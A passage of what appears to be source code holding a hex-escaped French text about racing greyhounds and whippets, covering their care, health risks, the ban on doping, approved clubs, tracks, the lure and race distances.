+"\x67\x6c\x61\x63\xe9\x65\x2c\x20\x61\x70\x72\xe8\x73\x20\x6c\x65" +"\x96\x20\x63\x6f\x75\x72\x73\x65\x73\x2e\x0d\x0d\x53\x6f\x69\x6e" +"\x73\x20\x3a\x0d\x0d\x09\x43\x68\x61\x6c\x65\x75\x72\x73\x20\x3a" +"\x0d\x49\x6c\x20\x65\x73\x74\x20\x69\x6e\x74\x65\x72\x64\x69\x74" +"\x20\x64\x27\x61\x6d\x65\x6e\x65\x72\x20\x75\x6e\x65\x20\x66\x65" +"\x6d\x65\x6c\x6c\x65\x20\x65\x6e\x20\x63\x68\x61\x6c\x65\x75\x72" +"\x73\x20\x61\x75\x20\x63\x79\x6e\x6f\x64\x72\x6f\x6d\x65\x2c\x20" +"\x63\x65\x6c\x61\x20\x76\x61\x20\x70\x65\x72\x74\x75\x72\x62\x65" 
+"\x72\x20\x6d\xe2\x6c\x65\x73\x20\x65\x74\x20\x66\x65\x6d\x65\x6c" +"\x6c\x65\x73\x2e\x0d\x0d\x09\x56\x61\x63\x63\x69\x6e\x73\x3a\x0d" +"\x4c\x61\x20\x76\x61\x63\x63\x69\x6e\x61\x74\x69\x6f\x6e\x20\x61" +"\x6e\x74\x69\x72\x61\x62\x69\x71\x75\x65\x20\x65\x73\x74\x20\x6f" +"\x62\x6c\x69\x67\x61\x74\x6f\x69\x72\x65\x2e\x0d\x4c\x65\x73\x20" +"\x76\x61\x63\x63\x69\x6e\x61\x74\x69\x6f\x6e\x73\x20\x63\x6f\x75" +"\x72\x61\x6e\x74\x65\x73\x20\x73\x6f\x6e\x74\x20\xe0\x20\x63\x6f" +"\x6e\x73\x65\x69\x6c\x6c\x65\x72\x2e\x0d\x0d\x09\x4d\x61\x73\x73" +"\x61\x67\x65\x73\x20\x65\x74\x20\xe9\x63\x68\x61\x75\x66\x66\x65" +"\x6d\x65\x6e\x74\x20\x3a\x0d\x49\x6c\x73\x20\x73\x6f\x6e\x74\x20" +"\xe0\x20\x63\x6f\x6e\x73\x65\x69\x6c\x6c\x65\x72\x2c\x20\x63\x6f" +"\x6d\x6d\x65\x20\x6c\x61\x20\x64\xe9\x74\x65\x6e\x74\x65\x20\x61" +"\x70\x72\xe8\x73\x20\x6c\x61\x20\x63\x6f\x75\x72\x73\x65\x2e\x0d" +"\x0d\x09\x54\xe9\x74\x61\x6e\x69\x65\x20\x3a\x0d\x43\x72\x69\x73" +"\x65\x20\x6e\x65\x72\x76\x65\x75\x73\x65\x20\x73\x6f\x69\x74\x20" +"\x61\x70\x72\xe8\x73\x20\x6c\x61\x20\x63\x6f\x75\x72\x73\x65\x20" +"\x28\x73\x70\x65\x63\x74\x61\x63\x75\x6c\x61\x69\x72\x65\x20\x65" +"\x74\x20\x62\x72\xe8\x76\x65\x29\x20\x73\x6f\x69\x74\x20\x70\x65" +"\x6e\x64\x61\x6e\x74\x20\x6c\x61\x20\x6c\x61\x63\x74\x61\x74\x69" +"\x6f\x6e\x2c\x20\x73\x75\x72\x74\x6f\x75\x74\x20\x20\x73\x69\x20" +"\x76\x6f\x75\x73\x20\x61\x76\x65\x7a\x20\x64\x6f\x6e\x6e\xe9\x20" +"\x64\x65\x73\x20\x73\x75\x70\x70\x6c\xe9\x6d\x65\x6e\x74\x73\x20" +"\x64\x65\x20\x63\x61\x6c\x63\x69\x75\x6d\x20\x70\x65\x6e\x64\x61" +"\x6e\x74\x20\x6c\x61\x20\x67\x65\x73\x74\x61\x74\x69\x6f\x6e\x2e" +"\x0d\x0d\x09\x50\x69\x73\x73\x65\x6d\x65\x6e\x74\x20\x64\x65\x20" +"\x73\x61\x6e\x67\x20\x28\x72\x68\x61\x62\x64\x6f\x6d\x79\x6f\x6c" +"\x79\x73\x65\x29\x3a\x0d\x55\x72\x69\x6e\x65\x73\x20\x62\x72\x75" +"\x6e\x65\x73\x20\x74\x72\x61\x64\x75\x69\x73\x61\x6e\x74\x20\x73" +"\x6f\x69\x74\x20\x75\x6e\x65\x20\x70\x69\x72\x6f\x70\x6c\x61\x73" 
+"\x6d\x6f\x73\x65\x2c\x20\x73\x6f\x69\x74\x20\x64\x65\x73\x20\x6d" +"\x69\x63\x72\x6f\x63\x6c\x61\x71\x75\x61\x67\x65\x73\x20\x65\x6e" +"\x20\x63\x6f\x75\x72\x73\x65\x73\x2c\x20\x73\x6f\x69\x74\x20\x75" +"\x6e\x65\x20\x61\x75\x74\x72\x65\x20\x6d\x61\x6c\x61\x64\x69\x65" +"\x2e\x0d\x0d\x09\x43\x6f\x75\x70\x20\x64\x65\x20\x63\x68\x61\x6c" +"\x65\x75\x72\x20\x3a\x0d\x41\x63\x63\x69\x64\x65\x6e\x74\x20\x67" +"\xe7\x61\x76\x65\x20\x61\x70\x72\xe8\x73\x20\x6c\x61\x20\x63\x6f" +"\x75\x72\x73\x65\x2c\x20\x73\x27\x69\x6c\x20\x66\x61\x69\x74\x20" +"\x63\x68\x61\x75\x64\x2c\x20\x73\x27\x69\x6c\x20\x79\x20\x61\x20" +"\x65\x75\x20\x63\x65\x72\x74\x61\x69\x6e\x73\x20\x64\x6f\x70\x61" +"\x6e\x74\x73\x2c\x20\x73\x69\x20\x6c\x65\x20\x73\x75\x6a\x65\x74" +"\x20\x65\x73\x74\x20\x65\x6e\x20\x6d\x61\x75\x76\x61\x69\x73\x65" +"\x20\xe9\x74\x61\x74\x2e\x20\x4c\x61\x20\x74\x65\x6d\x70\xe9\x72" +"\x61\x74\x75\x72\x65\x20\x6d\x6f\x6e\x74\x65\x20\xe0\x20\x70\x6c" +"\x75\x73\x20\x64\x65\x20\x34\x30\x2e\x20\x52\x65\x66\x72\x6f\x69" +"\x64\x69\x72\x20\x6c\x65\x20\x63\x6f\x72\x70\x73\x20\x65\x74\x20" +"\x6c\x61\x20\x74\xea\x74\x65\x20\x65\x74\x20\x70\x6f\x72\x74\x65" +"\x72\x20\x63\x68\x65\x7a\x20\x75\x6e\x20\x76\xe9\x74\xe9\x72\x69" +"\x6e\x61\x69\x72\x65\x2e\x0d\x0d\x09\x43\x6c\x61\x71\x75\x61\x67" +"\x65\x73\x2c\x20\x66\x72\x61\x63\x99\x75\x72\x65\x73\x20\x3a\x0d" +"\x41\x73\x73\x65\x7a\x20\x72\x61\x72\x65\x73\x2e\x20\x53\x75\x72" +"\x74\x6f\x75\x74\x20\x73\x75\x72\x20\x70\x69\x73\x74\x65\x73\x20" +"\x6d\x61\x6c\x20\x65\x6e\x74\x72\x65\x74\x65\x6e\x75\x65\x73\x20" +"\x61\x76\x65\x63\x20\x7a\x6f\x6e\x65\x73\x20\x64\x75\x72\x65\x73" +"\x20\x65\x74\x20\x6d\x6f\x6c\x6c\x65\x73\x20\x61\x6c\x74\x65\x72" +"\x6e\xe9\x65\x73\x2c\x20\x6f\x75\x20\x73\x75\x72\x20\x64\x65\x73" +"\x20\x63\x68\x69\x65\x6e\x73\x20\x6d\x61\x6c\x20\x6e\x6f\x75\x72" +"\x72\x69\x73\x20\x65\x74\x20\x6d\x61\x6c\x20\x65\x6e\x74\x72\x61" +"\xee\x6e\xe9\x73\x2e\x0d\x0d\x09\x47\x72\x6f\x73\x20\x64\x6f\x69" 
+"\x67\x74\x73\x20\x3a\x0d\x4c\xe9\x73\x69\x6f\x6e\x73\x20\x61\x72" +"\x74\x69\x63\x75\x6c\x61\x69\x72\x65\x73\x2c\x20\x74\x61\x6e\x74" +"\xf4\x74\x20\x65\x6e\x74\x6f\x72\x73\x65\x73\x2c\x20\x74\x61\x6e" +"\x74\xf4\x74\x20\x74\x65\x6e\x64\x69\x6e\x69\x74\x65\x73\x2c\x20" +"\x74\x61\x6e\x74\xf4\x74\x20\x66\x6f\x75\x72\x62\x75\x72\x65\x2c" +"\x20\x73\x75\x72\x20\x63\x68\x69\x65\x6e\x73\x20\x72\x61\x70\x69" +"\x64\x65\x73\x2c\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x6c\x6f\x75" +"\x72\x64\x73\x2c\x20\xe0\x20\x6c\x27\x6f\x63\x63\x61\x73\x69\x6f" +"\x6e\x20\x64\x65\x20\x62\x6f\x75\x73\x63\x75\x6c\x61\x64\x65\x73" +"\x2c\x20\x64\x65\x20\x6d\x61\x75\x76\x61\x69\x73\x20\x66\x72\x65" +"\x69\x6e\x61\x67\x65\x20\xe0\x20\x6c\x27\x61\x72\x72\x69\x76\xe9" +"\x65\x2c\x20\x70\x61\x72\x66\x6f\x69\x73\x20\x64\x65\x20\x70\x69" +"\x73\x74\x65\x73\x20\x6d\x61\x6c\x20\x65\x6e\x74\x72\x65\x74\x65" +"\x6e\x75\x65\x73\x2e\x0d\x49\x6c\x73\x20\x73\x75\x72\x76\x69\x65" +"\x6e\x6e\x65\x6e\x74\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x65\x6e" +"\x20\x70\x6c\x65\x69\x6e\x65\x20\x73\x61\x69\x73\x6f\x6e\x20\x73" +"\x75\x72\x20\x6c\x65\x73\x20\x73\x75\x6a\x65\x74\x73\x20\x66\x61" +"\x74\x69\x67\x75\xe9\x73\x2c\x20\x6d\x61\x6c\x20\x64\xe9\x74\x6f" +"\x78\x69\x71\x75\xe9\x73\x2e\x0d\x49\x6c\x73\x20\x70\x65\x75\x76" +"\x65\x6e\x74\x20\xea\x74\x72\x65\x20\x62\xe9\x6e\x69\x6e\x73\x20" +"\x6f\x75\x20\x67\x72\x61\x76\x65\x73\x2e\x0d\x53\x65\x6c\x6f\x6e" +"\x20\x6c\x65\x73\x20\x76\xe9\x74\xe9\x72\x69\x6e\x61\x69\x72\x65" +"\x73\x2c\x20\x6f\x6e\x20\x74\x72\x61\x69\x74\x65\x20\x70\x61\x72" +"\x20\x63\x68\x69\x72\x75\x72\x67\x69\x65\x2c\x20\x70\x61\x72\x20" +"\x61\x6e\x74\x69\x69\x6e\x66\x6c\x61\x6d\x6d\x61\x74\x6f\x69\x72" +"\x65\x73\x2c\x20\x70\x61\x72\x20\x70\x61\x6e\x73\x65\x6d\x65\x6e" +"\x74\x2c\x20\x70\x61\x72\x20\x68\xe1\x6d\xe9\x6f\x70\x61\x74\x68" +"\x69\x65\x2e\x20\x43\x68\x61\x71\x75\x65\x20\x6d\xe9\x74\x68\x6f" +"\x64\x65\x20\x61\x20\x64\x65\x73\x20\x73\x75\x63\x63\xe8\x73\x20" 
+"\x6f\x75\x20\x64\x65\x73\x20\xe9\x63\x68\x65\x63\x73\x2c\x20\x73" +"\x65\x6c\x6f\x6e\x20\x6c\x65\x73\x20\x63\x61\x73\x2e\x20\xe5\x6e" +"\x20\x61\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x73\x69\x67\x6e\x61" +"\x6c\xe9\x20\x64\x65\x73\x20\x63\x68\x75\x74\x65\x73\x20\x64\x65" +"\x20\x66\x6f\x72\x6d\x65\x20\x61\x70\x72\xe8\x73\x20\x63\x6f\x72" +"\x74\x69\x63\x6f\xef\x64\x65\x73\x2e\x0d\x0d\x09\x44\x6f\x70\x61" +"\x67\x65\x3a\x0d\x49\x6c\x20\x65\x73\x74\x20\x69\x6e\x74\x65\x72" +"\x64\x69\x74\x20\x6d\x61\x69\x73\x20\x74\x72\x6f\x70\x20\x75\x74" +"\x69\x6c\x69\x73\xe9\x2e\x0d\x4c\x61\x20\x70\x6c\x75\x70\x61\x72" +"\x74\x20\x6e\x27\x6f\x6e\x74\x20\x61\x75\x63\x75\x6e\x65\x20\x61" +"\x63\x74\x69\x6f\x6e\x2e\x0d\x4c\x65\x73\x20\x64\x6f\x70\x61\x6e" +"\x74\x73\x20\x73\x6f\x6e\x74\x20\x73\x6f\x69\x74\x20\x64\x65\x73" +"\x20\x72\x65\x74\x61\x72\x64\x61\x74\x65\x75\x72\x73\x20\x64\x65" +"\x20\x66\x61\x74\x69\x67\x75\x65\x20\x71\x75\x69\x20\x6e\x27\x6f" +"\x6e\x74\x20\x64\x27\x69\x6e\x74\xe9\x72\xea\x74\x20\x74\x68\xe9" +"\x6f\x72\x69\x71\x75\x65\x20\x71\x75\x65\x20\x70\x6f\x75\x72\x20" +"\x6c\x65\x73\x20\x63\x6f\x75\x72\x73\x65\x73\x20\x64\x65\x20\x70" +"\x6c\x75\x73\x20\x64\x65\x20\x31\x35\x30\x30\x20\x6d\xe8\x74\x72" +"\x65\x73\x2c\x20\x73\x6f\x69\x74\x20\x64\x65\x73\x20\x64\xe9\x66" +"\x61\x74\x69\x67\x61\x6e\x74\x73\x20\x71\x75\x69\x20\x6e\x65\x20" +"\x73\x65\x72\x76\x65\x6e\x74\x20\x71\x75\x27\x65\x6e\x20\x63\x61" +"\x73\x20\x64\x65\x20\x72\xe9\x70\xe9\x74\x69\x74\x69\x6f\x6e\x20" +"\xe0\x20\x69\x6e\x74\x65\x72\x76\x61\x6c\x6c\x65\x73\x20\x69\x6e" +"\x73\x75\x66\x66\x69\x73\x61\x6e\x74\x73\x2c\x20\x73\x6f\x69\x74" +"\x20\x64\x65\x73\x20\x70\x6f\x74\x65\x6e\x74\x69\x61\x6c\x69\x73" +"\x61\x74\x65\x75\x72\x73\x20\xe0\x20\x74\x72\xe8\x73\x20\x63\x6f" +"\x75\x72\x74\x65\x20\x64\x75\x72\xe9\x65\x20\x64\x27\x61\x63\x74" +"\x69\x6f\x6e\x2e\x20\x4c\x65\x73\x20\x64\x6f\x70\x61\x6e\x74\x73" +"\x20\x73\x6f\x6e\x74\x20\x74\x6f\x75\x6a\x6f\x75\x72\x73\x20\x64" 
+"\x61\x6e\x67\x65\x72\x65\x75\x78\x20\x70\x6f\x75\x72\x20\x6c\x65" +"\x20\x6c\xe9\x76\x72\x69\x65\x72\x2c\x20\x65\x74\x20\x69\x6c\x73" +"\x20\x73\x6f\x6e\x74\x20\x69\x6e\x75\x74\x69\x6c\x65\x73\x20\x73" +"\x75\x72\x20\x32\x30\x20\x73\x65\x63\x2e\x0d\x0d\x09\x52\x79\x74" +"\x68\x6d\x65\x20\x64\x65\x73\x20\x63\x6f\x75\x72\x73\x65\x73\x20" +"\x3a\x0d\x45\x6e\x20\x70\x72\x69\x6e\x63\x69\x70\x65\x2c\x20\x6c" +"\x65\x20\x6c\xe9\x76\x72\x69\x65\x72\x20\x70\x65\x75\x74\x20\x63" +"\x6f\x75\x72\x69\x72\x20\x73\x6f\x75\x76\x65\x6e\x74\x2c\x20\x69" +"\x6c\x20\x65\x73\x74\x20\x62\xe2\x74\x69\x20\x70\x6f\x75\x72\x20" +"\x63\x65\x6c\x61\x2e\x20\x4d\x61\x69\x73\x20\x65\x6e\x20\x63\x61" +"\x73\x20\x64\x65\x20\x6c\xe9\x73\x69\x6f\x6e\x20\x69\x6e\x61\x70" +"\x65\x72\xe7\x75\x65\x20\x69\x6c\x20\x70\x6f\x75\x72\x72\x61\x20" +"\x79\x20\x61\x76\x6f\x69\x72\x20\x62\x6c\x65\x73\x73\x75\x72\x65" +"\x20\x65\x74\x20\x6d\xe9\x66\x6f\x72\x6d\x65\x2c\x20\x63\x65\x20" +"\x71\x75\x69\x20\x63\x6f\x6e\x64\x75\x69\x74\x20\x63\x65\x72\x74" +"\x61\x69\x6e\x73\x20\xe0\x20\x6e\x65\x20\x72\xe9\x70\xe9\x74\x65" +"\x72\x20\x6c\x65\x73\x20\x63\x6f\x75\x72\x73\x65\x73\x20\x71\x75" +"\x65\x20\x72\x61\x72\x65\x6d\x65\x6e\x74\x2e\x20\x42\x69\x65\x6e" +"\x20\x6e\x6f\x75\x72\x72\x69\x20\x65\x74\x20\x62\x69\x65\x6e\x20" +"\x65\x6e\x74\x72\x61\xee\x6e\xe9\x2c\x20\x69\x6c\x20\x70\x65\x75" +"\x20\x63\x6f\x75\x72\x69\x72\x20\x74\x72\xe8\x73\x20\x66\x72\xe9" +"\x71\x75\x65\x6d\x6d\x65\x6e\x74\x2e\x0d\x4c\x65\x20\x72\x69\x73" +"\x71\x75\x65\x20\x64\x65\x20\x6c\xe9\x73\x69\x6f\x6e\x20\x69\x6e" +"\x61\x70\x65\x72\xe7\x75\x65\x20\x65\x73\x74\x20\x66\x69\x6e\x61" +"\x6c\x65\x6d\x65\x6e\x74\x20\x6c\x65\x20\x70\x72\x69\x6e\x63\x69" +"\x70\x61\x6c\x20\x63\x61\x73\x20\x63\x61\x72\x20\x69\x6c\x20\x65" +"\x6e\x74\x72\x61\xee\x6e\x65\x72\x61\x20\x75\x6e\x20\x61\x63\x63" +"\x69\x64\x65\x6e\x74\x2c\x20\x61\x74\x74\x72\x69\x62\x75\xe9\x20" +"\xe0\x20\x6c\x61\x20\x70\x69\x73\x74\x65\x2c\x20\x61\x75\x20\x74" 
+"\x65\x6d\x70\x73\x2c\x20\xe0\x20\x75\x6e\x20\x61\x63\x63\x69\x64" +"\x65\x6e\x74\x20\x64\x65\x20\x63\x6f\x75\x72\x73\x65\x2c\x20\x65" +"\x74\x63\x2e\x2e\x2e\x0d\x41\x70\x72\xe8\x73\x20\x6c\x61\x20\x72" +"\xe9\x75\x6e\x69\x6f\x6e\x20\x65\x78\x61\x6d\x69\x6e\x65\x7a\x20" +"\x65\x74\x20\x6e\x65\x74\x74\x6f\x79\x65\x7a\x20\x6c\x65\x73\x20" +"\x70\x69\x65\x64\x73\x2c\x20\x70\x61\x6c\x70\x65\x7a\x20\x62\x69" +"\x65\x6e\x20\x6c\x65\x73\x20\xe9\x70\x61\x75\x6c\x65\x73\x2c\x20" +"\x6c\x65\x73\x20\x63\x75\x69\x73\x73\x65\x73\x2c\x20\x6c\x65\x73" +"\x20\x61\x72\x74\x69\x63\x75\x6c\x61\x74\x69\x6f\x6e\x73\x2e\x20" +"\x45\x6e\x20\x63\x61\x73\x20\x64\x65\x20\x64\x6f\x75\x74\x65\x2c" +"\x20\x6d\x65\x74\x74\x65\x7a\x20\x6c\x65\x20\xe0\x20\x75\x6e\x20" +"\x72\x65\x70\x6f\x73\x20\x72\x65\x6c\x61\x74\x69\x66\x20\x28\x70" +"\x61\x73\x20\x64\x65\x20\x63\x6f\x75\x72\x73\x65\x29\x2e\x0d\x4e" +"\x65\x20\x6c\x61\x69\x73\x73\x65\x7a\x20\x6a\x61\x6d\x61\x69\x73" +"\x20\x70\x61\x73\x73\x65\x72\x20\x75\x6e\x20\x6d\x61\x75\x76\x61" +"\x69\x73\x20\x63\x68\x72\x6f\x6e\x6f\x20\x73\x61\x6e\x73\x20\x63" +"\x61\x75\x73\x65\x20\x28\x64\x65\x20\x63\x68\x75\x74\x65\x29\x2c" +"\x20\x73\x6f\x79\x65\x7a\x20\x70\x72\x75\x64\x65\x6e\x74\x20\x70" +"\x6f\x75\x72\x20\x61\x63\x63\x65\x48\x74\x65\x72\x20\x6c\x61\x20" +"\x63\x6f\x75\x72\x73\x65\x20\x73\x75\x69\x76\x61\x6e\x74\x65\x2e" +"\x0d\x43\x27\x65\x73\x74\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x75" +"\x6e\x20\x73\x69\x67\x6e\x65\x20\x70\x72\xe9\x63\x75\x72\x73\x65" +"\x75\x72\x20\x64\x27\x65\x6e\x6e\x75\x69\x73\x2e\x20\x55\x6e\x20" +"\x63\x68\x69\x65\x6e\x20\x62\x69\x65\x6e\x20\x65\x6e\x74\x72\x61" +"\xee\x6e\xe9\x20\x70\x65\x75\x74\x20\x66\x72\xe9\x71\x75\x65\x6d" +"\x6d\x65\x6e\x74\x20\x72\xe9\x70\xe9\x74\x65\x72\x20\x73\x65\x73" +"\x20\x63\x6f\x75\x72\x73\x65\x73\x2e\x20\x55\x6e\x20\x63\x68\x69" +"\x65\x6e\x20\x6d\x61\x6c\x20\x65\x6e\x74\x72\x61\xee\x6e\xe9\x20" +"\x6e\x65\x20\x70\x65\x75\x74\x20\x70\x61\x73\x2e\x20\x4d\x61\x69" 
+"\x73\x20\x63\x27\x65\x73\x74\x20\x61\x75\x73\x73\x69\x20\x61\x66" +"\x66\x61\x69\x72\x65\x20\x64\x27\x69\x6e\x64\x69\x76\x69\x64\x75" +"\x2c\x20\x61\x76\x65\x63\x20\x20\x64\x65\x20\x76\x69\x76\x65\x73" +"\x20\x63\x6f\x6e\x74\x72\x6f\x76\x65\x72\x73\x65\x73\x2e\x0d\x0d" +"\x51\x75\x65\x6c\x71\x75\x65\x73\x20\x72\x65\x6e\x73\x65\x69\x67" +"\x6e\x65\x6d\x65\x6e\x74\x73\x20\x69\x6e\x74\xe9\x72\x65\x73\x73" +"\x61\x6e\x74\x73\x20\x3a\x0d\x0d\x09\x43\x6c\x75\x62\x73\x20\x20" +"\x61\x67\x72\xe9\xe9\x73\x20\x3a\x0d\x41\x73\x73\x6f\x63\x69\x61" +"\x74\x69\x6f\x6e\x20\x31\x39\x30\x31\x20\x61\x67\x72\xe9\xe9\x65" +"\x20\x70\x61\x72\x20\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69" +"\x6f\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\x65\x6e\x20\x61" +"\x63\x63\x6f\x72\x64\x20\x61\x76\x65\x63\x20\x6c\x61\x20\x53\x6f" +"\x63\x69\xe9\x74\xe9\x20\x43\x61\x6e\x69\x6e\x65\x20\x6c\x6f\x63" +"\x61\x6c\x65\x2e\x20\x49\x6c\x20\x6e\x65\x20\x70\x65\x75\x74\x20" +"\x79\x20\x65\x6e\x20\x61\x76\x6f\x69\x72\x20\x71\x75\x27\x75\x6e" +"\x20\x73\x65\x75\x6c\x20\x70\x61\x72\x20\x72\x61\x79\x6f\x6e\x20" +"\x64\x65\x20\x37\x35\x4b\x6d\x20\x73\x69\x20\x6c\x61\x20\x70\x69" +"\x73\x74\x65\x20\x65\x73\x74\x20\x72\xe9\x73\x65\x72\x76\xe9\x65" +"\x20\x61\x75\x78\x20\xe9\x70\x72\x65\x75\x76\x65\x73\x20\x73\x70" +"\x6f\x72\x74\x69\x76\x65\x73\x2c\x20\x64\x65\x20\x35\x30\x4b\x6d" +"\x20\x73\x69\x20\x65\x6c\x6c\x65\x20\x65\x73\x74\x20\x70\x61\x72" +"\x74\x61\x67\xe9\x65\x20\x61\x76\x65\x63\x20\x75\x6e\x65\x20\x53" +"\x6f\x63\x69\xe9\x74\xe9\x20\xe0\x20\x50\x61\x72\x69\x20\x4d\x75" +"\x74\x75\x65\x6c\x2e\x0d\x49\x6c\x20\x65\x73\x74\x20\x70\x61\x72" +"\x66\x61\x69\x74\x65\x6d\x65\x6e\x74\x20\x61\x75\x74\x6f\x72\x69" +"\x73\xe9\x20\x65\x6e\x20\x46\x72\x61\x6e\x63\x65\x20\x64\x65\x20" +"\x64\x69\x73\x70\x75\x74\x65\x72\x20\x6c\x65\x73\x20\xe9\x70\x72" +"\x65\x75\x76\x65\x73\x20\x64\x65\x20\x6c\x61\x20\x46\xe9\x64\xe9" +"\x72\x61\x74\x69\x6f\x6e\x20\x64\x65\x73\x20\x53\x6f\x63\x69\xe9" 
+"\x74\xe9\x73\x20\x64\x65\x20\x43\x6f\x75\x72\x73\x65\x73\x20\x28" +"\x63\x6f\x75\x72\x73\x65\x73\x20\x61\x76\x65\x63\x20\x70\x61\x72" +"\x69\x20\x6d\x75\x74\x75\x65\x6c\x29\x20\x20\x71\x75\x69\x20\x61" +"\x20\x73\x6f\x6e\x20\x70\x72\x6f\x70\x72\x65\x20\x72\xe8\x67\x6c" +"\x65\x6d\x65\x6e\x74\x20\x28\x63\x6f\x64\x65\x20\x64\x65\x73\x20" +"\x63\x6f\x75\x72\x73\x65\x73\x29\x20\x65\x74\x20\x73\x65\x73\x20" +"\x70\x72\x6f\x70\x72\x65\x73\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74" +"\x73\x20\x28\x6c\x69\x76\x72\x65\x74\x73\x29\x2e\x0d\x0d\x09\x43" +"\x79\x6e\x6f\x64\x72\x6f\x6d\x65\x73\x20\x3a\x0d\x50\x69\x73\x74" +"\x65\x73\x20\x61\x67\x72\xe9\xe9\x65\x73\x2c\x20\x64\x6f\x6e\x74" +"\x20\x6c\x65\x73\x20\x63\x6f\x74\x65\x73\x20\x6f\x6e\x74\x20\xe9" +"\x74\xe9\x20\x6d\x65\x73\x75\x72\xe9\x65\x73\x20\x70\x61\x72\x20" +"\x75\x6e\x20\x65\x78\x70\x65\x72\x74\x20\x61\x67\x72\xe9\xe9\x2c" +"\x20\x61\x76\x65\x63\x20\x75\x6e\x20\x72\x61\x79\x6f\x6e\x20\x6d" +"\x69\x6e\x69\x6d\x75\x6d\x20\x64\x65\x20\x34\x30\x6d\x2e\x0d\x49" +"\x6c\x73\x20\x70\x65\x75\x76\x65\x6e\x74\x20\x61\x76\x6f\x69\x72" +"\x20\x75\x6e\x65\x20\x70\x69\x73\x74\x65\x20\x65\x6e\x20\x68\x65" +"\x72\x62\x65\x2c\x20\x65\x6e\x20\x73\x61\x62\x6c\x65\x2c\x20\x65" +"\x6e\x20\x67\x61\x7a\x6f\x6e\x20\x73\x75\x72\x20\x73\x61\x62\x6c" +"\x65\x2e\x20\x43\x68\x61\x71\x75\x65\x20\x73\x6f\x6c\x20\x61\x20" +"\x73\x65\x73\x20\x64\xe9\x66\x65\x6e\x73\x65\x75\x72\x73\x20\x65" +"\x74\x20\x73\x65\x73\x20\x64\xe9\x74\x72\x61\x63\x74\x65\x75\x72" +"\x73\x2e\x0d\x0d\x09\x4c\x65\x75\x72\x72\x65\x20\x3a\x0d\x4c\x65" +"\x20\x6c\x65\x75\x72\x72\x65\x20\x65\x73\x74\x20\x63\x6f\x6e\x73" +"\x74\x69\x74\x75\xe9\x20\x64\x65\x20\x72\x75\x62\x61\x6e\x73\x20" +"\x15\x6c\x61\x73\x74\x69\x71\x75\x65\x20\x70\x6f\x75\x72\x20\x6c" +"\x65\x73\x20\x45\x4e\x43\x2c\x20\x64\x65\x20\x70\x65\x61\x75\x20" +"\x64\x65\x20\x6c\x61\x70\x69\x6e\x20\x70\x6f\x75\x72\x20\x6c\x61" +"\x20\x50\x56\x4c\x2e\x20\x49\x6c\x20\x65\x73\x74\x20\x6d\xfb\x20" 
+"\x73\x6f\x69\x74\x20\x70\x61\x72\x20\x75\x6e\x20\x63\xe2\x62\x6c" +"\x65\x20\x65\x6e\x72\x6f\x75\x6c\xe9\x20\x73\x75\x72\x20\x75\x6e" +"\x65\x20\x62\x6f\x62\x69\x6e\x65\x20\x28\x6c\x65\x75\x72\x72\x65" +"\x20\x66\x69\x63\x65\x6c\x6c\x65\x29\x20\x61\x76\x65\x63\x20\x70" +"\x6f\x75\x6c\x69\x65\x73\x20\x64\x65\x20\x72\x65\x6e\x76\x6f\x69" +"\x2c\x20\x73\x6f\x69\x74\x20\x70\x61\x72\x20\x75\x6e\x20\x73\x79" +"\x73\x74\xe8\x6d\x65\x20\x61\x75\x74\x6f\x70\x72\x6f\x70\x75\x6c" +"\x73\xe9\x20\x67\x75\x69\x64\xe9\x20\x70\x61\x72\x20\x75\x6e\x20" +"\x72\x61\x69\x6c\x2e\x0d\x0d\x09\x44\x69\x73\x74\x61\x6e\x63\x65" +"\x73\x20\x3a\x0d\x4c\x65\x73\x20\x64\x69\x73\x74\x61\x6e\x63\x65" +"\x73\x20\x66\x72\x61\x6e\xe7\x61\x69\x73\x65\x73\x20\x73\x6f\x6e" +"\x74\x20\x64\x27\x65\x6e\x76\x69\x72\x6f\x6e\x20\x34\x38\x30\x6d" +"\x20\x6f\x75\x20\x32\x35\x30\x6d\x20\x64\x65\x20\x66\x61\xe7\x6f" +"\x6e\x20\xe0\x20\x61\x76\x6f\x69\x72\x20\x64\x65\x73\x20\x64\xe9" +"\x70\x61\x72\x74\x73\x20\x65\x6e\x20\x6c\x69\x67\x6e\x65\x20\x64" +"\x72\x6f\x69\x74\x65\x20\x71\x75\x69\x20\x6c\x69\x6d\x69\x74\x65" +"\x6e\x74\x20\x62\x6c\x65\x73\x73\x75\x72\x65\x73\x20\x65\x74\x20" +"\x62\x6f\x75\x73\x63\x75\x6c\x61\x64\x65\x73\x2e\x20\x4c\x65\x73" +"\x20\x64\x69\x73\x74\x61\x6e\x63\x65\x73\x20\x69\x6e\x74\x65\x72" +"\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x65\x73\x20\x70\x6f\x75\x72\x20" +"\x6c\x65\x73\x20\x77\x68\x69\x70\x70\x65\x74\x73\x20\x73\x6f\x6e" +"\x74\x20\x70\x6f\x75\x72\x20\x6c\x65\x20\x6d\x6f\x6d\x65\x6e\x74" +"\x20\x64\x65\x20\x33\x35\x30\x6d\x20\x63\x65\x20\x71\x75\x69\x20" +"\x69\x6d\x70\x6f\x73\x65\x20\x75\x6e\x65\x20\x63\x6f\x75\x72\x74" +"\x65\x20\x6c\x69\x67\x6e\x65\x20\x64\x72\x6f\x69\x74\x65\x20\x28" +"\x34\x30\x2d\x35\x30\x6d\x29\x20\x61\x76\x65\x63\x20\x62\x69\x65" +"\x6e\x20\x64\x65\x73\x20\x61\x6c\xe9\x61\x73\x20\x61\x75\x20\x74" +"\x6f\x75\x72\x6e\x61\x6e\x74\x2e\x20\x4d\x61\x69\x73\x20\x63\x65" +"\x6c\x61\x20\x70\x6f\x75\x72\x72\x61\x69\x74\x20\x63\x68\x61\x6e" 
